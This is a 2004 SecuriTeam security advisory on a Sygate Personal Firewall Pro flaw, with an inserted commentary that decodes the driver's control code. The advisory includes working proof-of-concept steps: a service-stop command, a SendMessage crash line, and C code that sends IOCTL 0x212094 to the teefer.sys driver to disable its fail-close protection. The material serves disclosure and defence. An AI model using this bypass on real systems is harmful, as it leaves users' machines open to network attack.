Date: 14 Jun 2004 14:05:51 +0200
From: SecuriTeam <support@securiteam.com>
To: [email protected]
Subject: [NT] Sygate Personal Firewall Pro May Be Disabled By Local Programs
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Sygate Personal Firewall Pro May Be Disabled By Local Programs
------------------------------------------------------------------------
SUMMARY
<http://soho.sygate.com/products/spf_pro.htm> Sygate Personal Firewall
Pro provides a "multi-layered shield of network, content, application, and
operating system protection for your PC. The Pro version includes a
comprehensive Intrusion Protection System (IPS) which includes IDS, DoS
protection, and Trojan protection."
Sygate Personal Firewall has a fail-safe mechanism that stops all network
traffic to and from the system if the firewall service is unavailable.
Hence, if a malicious local program is able to kill the firewall service,
all traffic will stop. However, there is a flaw in the implementation of
this feature that allows an attacker to bypass the mechanism.
DETAILS
Vulnerable Systems:
* Sygate Personal Firewall Pro version 5.5 Build 2525 on Win2k SP4
Sygate Personal Firewall Pro (SPFP) is implemented as a user-space service
(smc.exe), and as a kernel-space NDIS intermediate driver (teefer.sys).
The driver creates a device named \\device\Teefer. The user-space service
(smc.exe, tfman.dll) communicates with the kernel-space driver through
this device using specific Device I/O control codes.
The driver does not validate the source of the control codes, allowing
malicious programs to send control codes to the driver and disable its
fail-close protection. SPFP attempts to prevent this by allowing only one
program in user-space to open a handle to its driver. Theoretically, as
long as smc.exe is running, no other program can access the driver. This
simple protective measure can be circumvented in two ways:
1. If the program is running with administrative permissions, it can simply
stop smc.exe:
net stop smcservice
2. A non-administrative program can exploit the ListView control in SPFP's
GUI in order to crash the service. An example of the line of code needed
to do this is given below:
SendMessage(hHdrControl, HDM_GETITEMRECT, 1, (LPARAM)NON-WRITABLE_ADDR);
The fail-safe mechanism will then disable all incoming and outgoing
traffic by using the following code:
#include <windows.h>
#include <stdio.h>

/* Open a handle to the device object created by teefer.sys. */
HANDLE hDevice = CreateFile("\\\\.\\Teefer", GENERIC_WRITE | GENERIC_READ,
                            FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING,
                            FILE_ATTRIBUTE_NORMAL, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
    printf("Open failed\n");
}
else
{
    printf("Device opened.\n");
    /* Eight-byte buffer used for both input and output, both DWORDs zeroed. */
    char buffer[8];
    DWORD *ptr = (DWORD *)buffer;
    DWORD *ptr2 = (DWORD *)(buffer + 4);
    DWORD ret;
    *ptr = 0;
    *ptr2 = 0;
    /* Send control code 0x212094 to the driver through the open handle. */
    if(DeviceIoControl(hDevice, 0x212094, buffer, 8, buffer, 8,
                       &ret, 0))
        printf("Sent.\n");
    CloseHandle(hDevice);
}
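Decoding the control code quoted above tells an analyst what the Windows I/O manager will and will not enforce before the request ever reaches teefer.sys, which is the point the advisory makes about the driver not validating the source of control codes. The following C program is an added example, not code from the advisory or from Sygate: it implements the bit layout that the CTL_CODE macro in winioctl.h produces and applies it to 0x212094. Reading device type 0x21 as FILE_DEVICE_TRANSPORT is my interpretation of the public constants, not something the advisory states.

```c
#include <stdint.h>
#include <stdio.h>

/* Bit layout of a Windows I/O control code, as built by CTL_CODE in
 * winioctl.h:
 *   bits 31..16  device type
 *   bits 15..14  access the I/O manager requires on the handle
 *                (0 = FILE_ANY_ACCESS, 1 = FILE_READ_ACCESS, 2 = FILE_WRITE_ACCESS)
 *   bits 13..2   function number (0x800 and above are reserved for vendors)
 *   bits  1..0   buffering method (0 = METHOD_BUFFERED, 1 = METHOD_IN_DIRECT,
 *                2 = METHOD_OUT_DIRECT, 3 = METHOD_NEITHER)
 */
typedef struct {
    uint32_t device_type;
    uint32_t access;
    uint32_t function;
    uint32_t method;
} ioctl_fields;

/* Split a control code into its four fields. */
ioctl_fields decode_ioctl(uint32_t code)
{
    ioctl_fields f;
    f.device_type = (code >> 16) & 0xFFFF;
    f.access      = (code >> 14) & 0x3;
    f.function    = (code >> 2)  & 0xFFF;
    f.method      = code & 0x3;
    return f;
}

/* Inverse of decode_ioctl; the same expression CTL_CODE expands to. */
uint32_t encode_ioctl(uint32_t device_type, uint32_t function,
                      uint32_t method, uint32_t access)
{
    return ((device_type & 0xFFFF) << 16) | ((access & 0x3) << 14) |
           ((function & 0xFFF) << 2) | (method & 0x3);
}

/* Vendor-defined function numbers start at 0x800. */
int is_vendor_function(uint32_t function)
{
    return function >= 0x800;
}

/* 1 when the I/O manager forwards the request on any handle to the device,
 * so any caller check has to live in the driver itself. */
int requires_no_handle_access(uint32_t code)
{
    return decode_ioctl(code).access == 0;
}

static const char *access_name(uint32_t access)
{
    switch (access) {
    case 0:  return "FILE_ANY_ACCESS";
    case 1:  return "FILE_READ_ACCESS";
    case 2:  return "FILE_WRITE_ACCESS";
    default: return "FILE_READ_ACCESS|FILE_WRITE_ACCESS";
    }
}

static const char *method_name(uint32_t method)
{
    static const char *names[] = { "METHOD_BUFFERED", "METHOD_IN_DIRECT",
                                   "METHOD_OUT_DIRECT", "METHOD_NEITHER" };
    return names[method & 0x3];
}

int main(void)
{
    /* The control code quoted in the advisory. */
    uint32_t code = 0x212094u;
    ioctl_fields f = decode_ioctl(code);
    printf("IOCTL 0x%06X: device type 0x%02X, function 0x%03X%s, %s, %s\n",
           (unsigned)code, (unsigned)f.device_type, (unsigned)f.function,
           is_vendor_function(f.function) ? " (vendor range)" : "",
           method_name(f.method), access_name(f.access));
    return 0;
}
```

The code splits into function 0x825 in the vendor range, METHOD_BUFFERED, and a required access of FILE_ANY_ACCESS. That last field is the one that matters for a defender: the I/O manager passes such a request through on any handle to \\.\Teefer, whatever access mask it was opened with, so distinguishing smc.exe from another local process is entirely the driver's job. A control code encoded with FILE_WRITE_ACCESS would at least be refused on a read-only handle; it still would not identify the caller, which is why the driver's own check remains the real mitigation.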
Vendor Status:
The vendor has been contacted and the vulnerability will be fixed in the
upcoming release.
Disclosure Timeline
20 May 04 - Vulnerability Discovered
30 May 04 - Initial Vendor Notification
08 Jun 04 - Initial Vendor Response
13 Jun 04 - Public Release
ADDITIONAL INFORMATION
The information has been provided by <mailto:chewkeong@security.org.sg>
Chew Keong TAN.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.